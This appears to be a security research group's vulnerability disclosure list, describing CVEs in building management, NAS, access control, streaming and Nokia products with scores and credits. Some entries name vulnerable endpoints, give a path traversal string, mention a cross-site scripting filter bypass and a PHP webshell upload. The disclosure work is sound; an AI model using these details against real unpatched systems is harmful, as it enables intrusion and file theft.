Software Version: Johnson Controls Metasys MREWeb Service 9.0.0.4256
NISThttps://nvd.nist.gov/vuln/detail/CVE-2020-9050
CVSv3: 7.5
Severity: High
Credits
: Alessandro Bosco, Luca Di Giuseppe, Stefano Scipioni, Massimiliano Brolli

A remote non-authenticated attacker can define an arbitrary full path name while using the web resource /MREService/Download.aspx. By using this functionality, an attacker can download arbitrary files from the system.

CVE-2020-7573 – Schneider Electric StruxureWare Building Operation WebReports

Vulnerability Description: Improper Access Control
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NISThttps://nvd.nist.gov/vuln/detail/CVE-2020-7573
CVSv3: 6.5
Severity: Medium
Credits
: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli

A remote non-authenticated attacker is able to access a restricted web resource due to improper access control.

CVE-2020-7572 – Schneider Electric StruxureWare Building Operation WebReports

Vulnerability Description: Improper Restriction of XML External Entity Reference
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NISThttps://nvd.nist.gov/vuln/detail/CVE-2020-7572
CVSv3: 8.8
Severity:
High
Credits
: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli

A remote user, authenticated to Building Operation WebReports, is able to inject arbitrary XML code containing a reference to an external entity via a crafted HTTP request into the server-side XML parser without being sanitized. By exploiting this vulnerability, an attacker can access the contents of a file on the system potentially containing sensitive data, other restricted web resources via server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts like a denial of service.

CVE-2020-7571 – Schneider Electric StruxureWare Building Operation WebReports

Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting Reflected)
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NISThttps://nvd.nist.gov/vuln/detail/CVE-2020-7571
CVSv3: 5.4
Severity: Medium
Credits
: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli

Multiple Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Reflected) vulnerability exists that could cause a remote attacker to inject arbitrary web script or HTML due to incorrect sanitization of user supplied data and achieve a Cross-Site Scripting reflected attack against other WebReport users.

CVE-2020-7570 – Schneider Electric StruxureWare Building Operation WebReports

Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting Stored)
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NISThttps://nvd.nist.gov/vuln/detail/CVE-2020-7570
CVSv3: 5.4
Severity: Medium
Credits
: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli

Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Stored) vulnerability exists that could cause an authenticated remote user being able to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and achieve a Cross-Site Scripting stored attack against other WebReport users.

CVE-2020-7569 – Schneider Electric StruxureWare Building Operation WebReports

Vulnerability Description: Unrestricted Upload of File with Dangerous Type
Software Version: VAM: Schneider Electric StruxureWare Building Operation WebReports versions 1.0 – 3.1.
NISThttps://nvd.nist.gov/vuln/detail/CVE-2020-7569
CVSv3: 8.8
Severity: High
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli

Unrestricted Upload of File with Dangerous Type vulnerability exists that could cause an authenticated remote user being able to upload arbitrary files due to incorrect verification of user supplied files and achieve remote code execution.

CVE-2020-2505 – QNAP QES

Vulnerability Description: Information Disclosure
Software Version: QES 2.0.0
NIST:
https://nvd.nist.gov/vuln/detail/CVE-2020-2505
CVSv3: 2.3
Severity: Low
Credits
: Francesco Giordano, Francesco Pigini, Sebastiano Lanzarotto, Massimiliano Brolli

In QNAP QES 2.0.0 there is a vulnerability that allows an attacker to exploit a type confusion to find information on the platform.

CVE-2020-2504 – QNAP QES

Vulnerability Description: Arbitrary File Download
Software Version: QES 2.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-2504
CVSv3: 7.5
Severity: High
Credits
: Francesco Giordano, Francesco Pigini, Sebastiano Lanzarotto, Massimiliano Brolli

A vulnerability was found in QNAP QES 2.0 that allows authenticated attacker to escape the webroot and download file of the NAS. The vulnerability resides in the download functionality.

CVE-2020-2503 – QNAP QES

Vulnerability Description: Stored XSS via Arbitrary File upload
Software Version: QES 2.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-2503
CVSv3: 5.4
Severity: Medium
Credits
: Francesco Giordano, Francesco Pigini, Sebastiano Lanzarotto, Massimiliano Brolli

A vulnerability was found in QNAP QES 2.0 that If exploited, vulnerability could allow remote attackers to inject malicious code in File Station. The vulnerability resides in the upload functionality that doesn’t perform the correct sanitization.

CVE-2019-19994 - Selesta Visual Access Manager

Vulnerability Description: OS Command Injection Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-19994
CVSv3: 9.8
Severity: Critical
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.

An attacker without authentication is able to execute arbitrary operating system command by injecting a HTTP/POST parameter on the PHP Web page.

CVE-2019-19993 - Selesta Visual Access Manager

Vulnerability Description: Multiple Full Path Disclosure Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-19993
CVSv35.3
Severity: Medium
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.

This server is configured to display PHP error messages. One or more fully qualified path names were found on this page. From this information the attacker may learn the file system structure from the web server. This information can be used to conduct further attacks.

CVE-2019-19992 - Selesta Visual Access Manager

Vulnerability Description: Arbitrary file read Post-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-19992
CVSv36.5
Severity: Medium
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.

A user with valid credentials is able to read XML files on the filesystem via the web interface. The PHP page doesn’t check the parameter that identify the file name to be read. Thus, an attacker can manipulate the file name to access any sensitive file within the filesystem.

CVE-2019-19991 - Selesta Visual Access Manager

Vulnerability Description: Multiple XSS reflected Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-19991
CVSv3: 5.4
Severity: Medium
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.

Cross-site scripting Reflected (XSS) vulnerability allows authenticated remote attackers to inject arbitrary web script or HTML into almost any HTTP/GET-POST parameter which reflect the user input without sanitization.

CVE-2019-19990 - Selesta Visual Access Manager

Vulnerability Description: Multiple XSS Stored Post-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-19990
CVSv35.4
Severity: Medium
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.

Cross-site scripting Stored (XSS) vulnerability allows authenticated remote attackers to inject arbitrary web script or HTML into some HTTP/GET-POST parameter which reflect the user input stored on the system. 

CVE-2019-19989 - Selesta Visual Access Manager

Vulnerability Description: Multiple Broken Access Control Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-19989
CVSv37.5
Severity: High
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.

Access control (authorization) determines which users can interact with systems and resources within the Web interface. When access control is broken, users could send unauthorized requests to the application. Unauthorized access to system functionality and resources creates an exploitable weakness that opens your company to harmful and potentially expensive outcomes.

CVE-2019-19988 – Selesta Visual Access Manager

Vulnerability Description: Arbitrary file write Post-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-19988
CVSv38.8
Severity: High
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.

A user with valid credentials is able to create and write XML files on the filesystem via the web interface. The PHP page doesn’t check the parameter that identify the file name to be created. Thus, an attacker can manipulate the file name to create any type of file within the filesystem.

CVE-2019-19987 - Selesta Visual Access Manager

Vulnerability Description: Multiple Cross-Site request forgery pre authentication
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-19987
CVSv36.5
Severity: Medium
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which he is currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. This vulnerability has been found in several page. An attacker can exploit it in functionalities such as change password, add user, add privileges and so on.

CVE-2019-19986 - Selesta Visual Access Manager

Vulnerability Description: SQL Injection Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-19986
CVSv37.5
Severity: High
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.

An attacker without authentication is able to execute arbitrary SQL statements by injecting the HTTP/POST-GET parameter in the PHP Web page.

CVE-2019-19456 - WOWZA Streaming Engine

Vulnerability Description: Pre-Auth Cross Site Scripting
Software Version: Wowza Streaming Engine < 4.x.x
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19456
CVSv3: 6.1
Severity: Medium

Credits: Francesco Giordano, Massimiliano Brolli

A Reflected XSS was found in the server selection box inside the login page at:
http://[host]/enginemanager/loginfailed.html

CVE-2019-19455 - WOWZA Streaming Engine

Vulnerability Description: Local Privilege Escalation
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19455
CVSv3: 7.8
Severity: High
Credits: Francesco Giordano, Massimiliano Brolli

A local privilege escalation was found in the Linux Version of the server. A user can write arbitrary command in every file in /usr/local/WowzaStreamingEngine/manager/bin/ since they are writable by anyone and executed at boot or stop of the server as root.

CVE-2019-19454 - WOWZA Streaming Engine

Vulnerability Description: Arbitrary File Download
Software Version: Wowza Streaming Engine < 4.x.x
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19454
CVSv3: 7.5
Severity: High
Credits: Francesco Giordano, Massimiliano Brolli

An arbitrary file download was found in the "Download Log" functionality at
https://[host]/enginemanager/server/logs/download

CVE-2019-19453 - WOWZA Streaming Engine

Vulnerability Description: Stored XSS
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19453
CVSv3: 6.1
Severity: Medium
Credits: Francesco Giordano, Massimiliano Brolli

An authenticated user, with access to the proxy license editing is able insert a malicious payload that will be triggered in the main page of server settings.

CVE-2019-17406 - NOKIA IMPACT

Vulnerability Description: Path Traversal
Software Version: NOKIA IMPACT < 18A
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-17406
CVSv3: 5.3
Severity: Medium
Credits:
 Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli

An authenticated user with access to the CDP component of NOKIA IMPACT is able to save file in arbitrary positions on the filesystem. This vulnerability was found in a feature of the system that allows to load multiple devices by uploading a properly formatted CSV file.

The filename parameter is vulnerable to a path traversal vulnerability, indeed naming the file as a relative path an attacker is able to save it in an arbitrary position on the filesystem (e.g. ../../../../../../../tmp/myfile.csv)

Click here to enlarge the image.

CVE-2019-17405 - NOKIA IMPACT

Vulnerability Description: Cross Site Scripting
Software Version: NOKIA IMPACT < 18A
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-17405
CVSv36.1
Severity: Medium
Credits
: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli

A Reflected Self Reflected Cross Site Scripting was found in the Manual Page of Nokia CDP at https://[host]/ui/help/en_US/[redacted]ConsoleHelp/index

The payload used is shown on the left (click here to enlarge the image).

There is a filter in the input that removes the . but we managed to bypass it accessing cookie as key of document.

CVE-2019-17404 - NOKIA IMPACT

Vulnerability Description: Full Path Disclosure
Software Version: NOKIA IMPACT < 18A
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-17404
CVSv34.3
Severity: Medium
Credits
: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli

An authenticated user with access to the CDP component of NOKIA IMPACT is able to leak the full path of the installation. In particular, the massive device upload feature (devceimport) releases detailed information about the location where the files are saved within the application filesystem.

If the path traversal is exploited to point to a non-existent path the application will throw an unhandled exception, leaking the full path of where the files are saved (Full path disclosure)

Click here to enlarge image.

CVE-2019-17403 - NOKIA IMPACT

Vulnerability Description: Unrestricted File Upload
Software Version: NOKIA IMPACT < 18A
NISThttps://nvd.nist.gov/vuln/detail/CVE-2019-17403
CVSv3: 8.8
Severity: High

Credits: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli

An authenticated user with access to the CDP component of NOKIA IMPACT is able to upload files with arbitrary extensions.

The deviceImport function parses every file received with a csv_parse function. We managed to load a non-csv file adding at the beginning of it the following line followed by our payload.

We uploaded PHP Webshell in a path served by Apache (in our case /opt/[redacted]/5/) and got code execution as apache user.

Click here to enlarge image.